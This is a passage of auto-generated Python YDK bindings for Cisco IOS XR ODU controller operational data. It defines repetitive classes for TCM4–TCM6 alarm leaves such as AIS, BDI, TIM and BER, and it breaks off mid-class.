    .. attribute:: reporting_enabled

        Is reporting enabled?
        **type**\: bool
        **config**\: False

    .. attribute:: is_detected

        Is defect detected?
        **type**\: bool
        **config**\: False

    .. attribute:: is_asserted

        Is defect declared?
        **type**\: bool
        **config**\: False

    .. attribute:: counter

        Alarm counter
        **type**\: int
        **range:** 0..18446744073709551615
        **config**\: False

    """

    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Python 2/3 compatible super() call for this generated class.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.Tcm4Biae, self).__init__()

        self.yang_name = "tcm4-biae"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Leaf map: python attribute -> (YLeaf descriptor, accepted python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm4-biae"
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Route all assignments through _Entity_ so only known leaves are settable.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm4Biae, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm4Biae']['meta_info']
class Tcm4Bdi(_Entity_):
    """
    TCM4 Backward Defect Monitoring

    All leaves are operational state (**config**\: False).

    .. attribute:: reporting_enabled

        Is reporting enabled?
        **type**\: bool
        **config**\: False

    .. attribute:: is_detected

        Is defect detected?
        **type**\: bool
        **config**\: False

    .. attribute:: is_asserted

        Is defect declared?
        **type**\: bool
        **config**\: False

    .. attribute:: counter

        Alarm counter
        **type**\: int
        **range:** 0..18446744073709551615
        **config**\: False

    """

    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Python 2/3 compatible super() call for this generated class.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.Tcm4Bdi, self).__init__()

        self.yang_name = "tcm4-bdi"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Leaf map: python attribute -> (YLeaf descriptor, accepted python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm4-bdi"
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Route all assignments through _Entity_ so only known leaves are settable.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm4Bdi, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm4Bdi']['meta_info']
class Tcm4Tim(_Entity_):
    """
    TCM4 Trail Trace Identifier Mismatch

    All leaves are operational state (**config**\: False).

    .. attribute:: reporting_enabled

        Is reporting enabled?
        **type**\: bool
        **config**\: False

    .. attribute:: is_detected

        Is defect detected?
        **type**\: bool
        **config**\: False

    .. attribute:: is_asserted

        Is defect declared?
        **type**\: bool
        **config**\: False

    .. attribute:: counter

        Alarm counter
        **type**\: int
        **range:** 0..18446744073709551615
        **config**\: False

    """

    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Python 2/3 compatible super() call for this generated class.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.Tcm4Tim, self).__init__()

        self.yang_name = "tcm4-tim"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Leaf map: python attribute -> (YLeaf descriptor, accepted python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm4-tim"
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Route all assignments through _Entity_ so only known leaves are settable.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm4Tim, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm4Tim']['meta_info']
class Tcm4SfBer(_Entity_):
    """
    TCM4 SF BER alarm

    All leaves are operational state (**config**\: False).

    .. attribute:: reporting_enabled

        Is reporting enabled?
        **type**\: bool
        **config**\: False

    .. attribute:: is_detected

        Is defect detected?
        **type**\: bool
        **config**\: False

    .. attribute:: is_asserted

        Is defect declared?
        **type**\: bool
        **config**\: False

    .. attribute:: counter

        Alarm counter
        **type**\: int
        **range:** 0..18446744073709551615
        **config**\: False

    """

    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Python 2/3 compatible super() call for this generated class.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.Tcm4SfBer, self).__init__()

        self.yang_name = "tcm4-sf-ber"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Leaf map: python attribute -> (YLeaf descriptor, accepted python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm4-sf-ber"
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Route all assignments through _Entity_ so only known leaves are settable.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm4SfBer, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm4SfBer']['meta_info']
class Tcm4SdBer(_Entity_):
    """
    TCM4 SD BER alarm

    All leaves are operational state (**config**\: False).

    .. attribute:: reporting_enabled

        Is reporting enabled?
        **type**\: bool
        **config**\: False

    .. attribute:: is_detected

        Is defect detected?
        **type**\: bool
        **config**\: False

    .. attribute:: is_asserted

        Is defect declared?
        **type**\: bool
        **config**\: False

    .. attribute:: counter

        Alarm counter
        **type**\: int
        **range:** 0..18446744073709551615
        **config**\: False

    """

    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Python 2/3 compatible super() call for this generated class.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.Tcm4SdBer, self).__init__()

        self.yang_name = "tcm4-sd-ber"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Leaf map: python attribute -> (YLeaf descriptor, accepted python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm4-sd-ber"
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Route all assignments through _Entity_ so only known leaves are settable.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm4SdBer, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm4SdBer']['meta_info']
class Tcm5Ais(_Entity_):
    """
    TCM5 Alarm Indication Signal

    All leaves are operational state (**config**\: False).

    .. attribute:: reporting_enabled

        Is reporting enabled?
        **type**\: bool
        **config**\: False

    .. attribute:: is_detected

        Is defect detected?
        **type**\: bool
        **config**\: False

    .. attribute:: is_asserted

        Is defect declared?
        **type**\: bool
        **config**\: False

    .. attribute:: counter

        Alarm counter
        **type**\: int
        **range:** 0..18446744073709551615
        **config**\: False

    """

    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Python 2/3 compatible super() call for this generated class.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.Tcm5Ais, self).__init__()

        self.yang_name = "tcm5-ais"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Leaf map: python attribute -> (YLeaf descriptor, accepted python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm5-ais"
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Route all assignments through _Entity_ so only known leaves are settable.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm5Ais, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm5Ais']['meta_info']
class Tcm5Ltc(_Entity_):
    """
    TCM5 Loss of Tandem connection Monitoring

    All leaves are operational state (**config**\: False).

    .. attribute:: reporting_enabled

        Is reporting enabled?
        **type**\: bool
        **config**\: False

    .. attribute:: is_detected

        Is defect detected?
        **type**\: bool
        **config**\: False

    .. attribute:: is_asserted

        Is defect declared?
        **type**\: bool
        **config**\: False

    .. attribute:: counter

        Alarm counter
        **type**\: int
        **range:** 0..18446744073709551615
        **config**\: False

    """

    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Python 2/3 compatible super() call for this generated class.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.Tcm5Ltc, self).__init__()

        self.yang_name = "tcm5-ltc"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Leaf map: python attribute -> (YLeaf descriptor, accepted python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm5-ltc"
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Route all assignments through _Entity_ so only known leaves are settable.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm5Ltc, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm5Ltc']['meta_info']
class Tcm5Oci(_Entity_):
    """
    TCM5 Open Connection Indication

    All leaves are operational state (**config**\: False).

    .. attribute:: reporting_enabled

        Is reporting enabled?
        **type**\: bool
        **config**\: False

    .. attribute:: is_detected

        Is defect detected?
        **type**\: bool
        **config**\: False

    .. attribute:: is_asserted

        Is defect declared?
        **type**\: bool
        **config**\: False

    .. attribute:: counter

        Alarm counter
        **type**\: int
        **range:** 0..18446744073709551615
        **config**\: False

    """

    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Python 2/3 compatible super() call for this generated class.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.Tcm5Oci, self).__init__()

        self.yang_name = "tcm5-oci"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Leaf map: python attribute -> (YLeaf descriptor, accepted python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm5-oci"
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Route all assignments through _Entity_ so only known leaves are settable.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm5Oci, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm5Oci']['meta_info']
class Tcm5Lck(_Entity_):
    """
    TCM5 Upstream Connection Locked

    All leaves are operational state (**config**\: False).

    .. attribute:: reporting_enabled

        Is reporting enabled?
        **type**\: bool
        **config**\: False

    .. attribute:: is_detected

        Is defect detected?
        **type**\: bool
        **config**\: False

    .. attribute:: is_asserted

        Is defect declared?
        **type**\: bool
        **config**\: False

    .. attribute:: counter

        Alarm counter
        **type**\: int
        **range:** 0..18446744073709551615
        **config**\: False

    """

    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Python 2/3 compatible super() call for this generated class.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.Tcm5Lck, self).__init__()

        self.yang_name = "tcm5-lck"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Leaf map: python attribute -> (YLeaf descriptor, accepted python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm5-lck"
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Route all assignments through _Entity_ so only known leaves are settable.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm5Lck, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm5Lck']['meta_info']
class Tcm5Iae(_Entity_):
    """
    TCM5 Incoming Alignment Error

    .. attribute:: reporting_enabled
        Is reporting enabled?
        **type**\: bool
        **config**\: False
    .. attribute:: is_detected
        Is defect detected?
        **type**\: bool
        **config**\: False
    .. attribute:: is_asserted
        Is defect declared?
        **type**\: bool
        **config**\: False
    .. attribute:: counter
        Alarm counter
        **type**\: int
        **range:** 0..18446744073709551615
        **config**\: False
    """
    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Zero-argument super() on Python 3; explicit form kept for Python 2.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.Tcm5Iae, self).__init__()

        self.yang_name = "tcm5-iae"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Map Python attribute name -> (YLeaf descriptor, accepted Python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        # Leaf values are unset until populated from the device.
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm5-iae"
        # Once frozen, attribute writes are validated by __setattr__ below.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Restrict settable attributes to the declared YANG leafs.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm5Iae, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        # Lazy import avoids loading the large meta table at module import time.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm5Iae']['meta_info']
class Tcm5Biae(_Entity_):
    """
    TCM5 Backward Incoming Alignment Error

    .. attribute:: reporting_enabled
        Is reporting enabled?
        **type**\: bool
        **config**\: False
    .. attribute:: is_detected
        Is defect detected?
        **type**\: bool
        **config**\: False
    .. attribute:: is_asserted
        Is defect declared?
        **type**\: bool
        **config**\: False
    .. attribute:: counter
        Alarm counter
        **type**\: int
        **range:** 0..18446744073709551615
        **config**\: False
    """
    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Zero-argument super() on Python 3; explicit form kept for Python 2.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.Tcm5Biae, self).__init__()

        self.yang_name = "tcm5-biae"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Map Python attribute name -> (YLeaf descriptor, accepted Python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        # Leaf values are unset until populated from the device.
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm5-biae"
        # Once frozen, attribute writes are validated by __setattr__ below.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Restrict settable attributes to the declared YANG leafs.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm5Biae, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        # Lazy import avoids loading the large meta table at module import time.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm5Biae']['meta_info']
class Tcm5Bdi(_Entity_):
    """
    TCM5 Backward Defect Monitoring

    .. attribute:: reporting_enabled
        Is reporting enabled?
        **type**\: bool
        **config**\: False
    .. attribute:: is_detected
        Is defect detected?
        **type**\: bool
        **config**\: False
    .. attribute:: is_asserted
        Is defect declared?
        **type**\: bool
        **config**\: False
    .. attribute:: counter
        Alarm counter
        **type**\: int
        **range:** 0..18446744073709551615
        **config**\: False
    """
    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Zero-argument super() on Python 3; explicit form kept for Python 2.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.Tcm5Bdi, self).__init__()

        self.yang_name = "tcm5-bdi"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Map Python attribute name -> (YLeaf descriptor, accepted Python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        # Leaf values are unset until populated from the device.
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm5-bdi"
        # Once frozen, attribute writes are validated by __setattr__ below.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Restrict settable attributes to the declared YANG leafs.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm5Bdi, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        # Lazy import avoids loading the large meta table at module import time.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm5Bdi']['meta_info']
class Tcm5Tim(_Entity_):
    """
    TCM5 Trail Trace Identifier Mismatch

    .. attribute:: reporting_enabled
        Is reporting enabled?
        **type**\: bool
        **config**\: False
    .. attribute:: is_detected
        Is defect detected?
        **type**\: bool
        **config**\: False
    .. attribute:: is_asserted
        Is defect declared?
        **type**\: bool
        **config**\: False
    .. attribute:: counter
        Alarm counter
        **type**\: int
        **range:** 0..18446744073709551615
        **config**\: False
    """
    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Zero-argument super() on Python 3; explicit form kept for Python 2.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.Tcm5Tim, self).__init__()

        self.yang_name = "tcm5-tim"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Map Python attribute name -> (YLeaf descriptor, accepted Python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        # Leaf values are unset until populated from the device.
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm5-tim"
        # Once frozen, attribute writes are validated by __setattr__ below.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Restrict settable attributes to the declared YANG leafs.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm5Tim, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        # Lazy import avoids loading the large meta table at module import time.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm5Tim']['meta_info']
class Tcm5SfBer(_Entity_):
    """
    TCM5 SF BER alarm

    .. attribute:: reporting_enabled
        Is reporting enabled?
        **type**\: bool
        **config**\: False
    .. attribute:: is_detected
        Is defect detected?
        **type**\: bool
        **config**\: False
    .. attribute:: is_asserted
        Is defect declared?
        **type**\: bool
        **config**\: False
    .. attribute:: counter
        Alarm counter
        **type**\: int
        **range:** 0..18446744073709551615
        **config**\: False
    """
    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Zero-argument super() on Python 3; explicit form kept for Python 2.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.Tcm5SfBer, self).__init__()

        self.yang_name = "tcm5-sf-ber"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Map Python attribute name -> (YLeaf descriptor, accepted Python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        # Leaf values are unset until populated from the device.
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm5-sf-ber"
        # Once frozen, attribute writes are validated by __setattr__ below.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Restrict settable attributes to the declared YANG leafs.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm5SfBer, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        # Lazy import avoids loading the large meta table at module import time.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm5SfBer']['meta_info']
class Tcm5SdBer(_Entity_):
    """
    TCM5 SD BER alarm

    .. attribute:: reporting_enabled
        Is reporting enabled?
        **type**\: bool
        **config**\: False
    .. attribute:: is_detected
        Is defect detected?
        **type**\: bool
        **config**\: False
    .. attribute:: is_asserted
        Is defect declared?
        **type**\: bool
        **config**\: False
    .. attribute:: counter
        Alarm counter
        **type**\: int
        **range:** 0..18446744073709551615
        **config**\: False
    """
    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
        # Zero-argument super() on Python 3; explicit form kept for Python 2.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Odu.Controllers.Controller.Info.Alarm.Tcm5SdBer, self).__init__()

        self.yang_name = "tcm5-sd-ber"
        self.yang_parent_name = "alarm"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Map Python attribute name -> (YLeaf descriptor, accepted Python types).
        self._leafs = OrderedDict([
            ('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
            ('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
            ('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
            ('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
        ])
        # Leaf values are unset until populated from the device.
        self.reporting_enabled = None
        self.is_detected = None
        self.is_asserted = None
        self.counter = None
        self._segment_path = lambda: "tcm5-sd-ber"
        # Once frozen, attribute writes are validated by __setattr__ below.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Restrict settable attributes to the declared YANG leafs.
        self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm5SdBer, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)

    @staticmethod
    def _meta_info():
        # Lazy import avoids loading the large meta table at module import time.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
        return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm5SdBer']['meta_info']
class Tcm6Ais(_Entity_):
    """
    TCM6 Alarm Indication Signal

    .. attribute:: reporting_enabled
        Is reporting enabled?
        **type**\: bool
        **config**\: False
    .. attribute:: is_detected
        Is defect detected?
        **type**\: bool
        **config**\: False
    .. attribute:: is_asserted
        Is defect declared?
        **type**\: bool
        **config**\: False
    .. attribute:: counter
        Alarm counter
        **type**\: int
        **range:** 0..18446744073709551615
        **config**\: False
    """
    _prefix = 'controller-odu-oper'
    _revision = '2015-11-09'

    def __init__(self):
